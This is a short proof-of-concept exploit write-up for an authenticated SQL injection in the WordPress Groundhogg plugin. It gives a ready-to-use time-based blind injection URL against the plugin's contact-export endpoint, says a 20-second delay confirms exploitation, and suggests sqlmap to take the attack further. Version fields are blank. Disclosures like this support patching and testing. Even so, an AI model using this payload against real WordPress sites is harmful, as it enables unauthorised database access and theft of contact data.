Proof of Concept
# Exploit Title: WordPress Groundhogg <= Authenticated SQL Injection Vulnerability # Date: 23-10-2019 # Exploit Author: Lucian Ioan Nitescu # Contact: # Webiste: # Vendor Homepage: # Software Link: # Version: # Tested on: Ubuntu 18.04 / WordPress 5.3 1. Description: WordPress Groundhogg plugin with a version lower than is affected by an Authenticated SQL Injection vulnerability. 2. Proof of Concept: Authenticated SQL Injection: - Using an WordPress user, access <your target> /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0 - The response will be returned after 20 seconds proving the successful exploitation of the vulnerability. - Sqlmap can be used to further exploit the vulnerability.
Share this page: Sharing Facebook Twitter LinkedIn Copy Text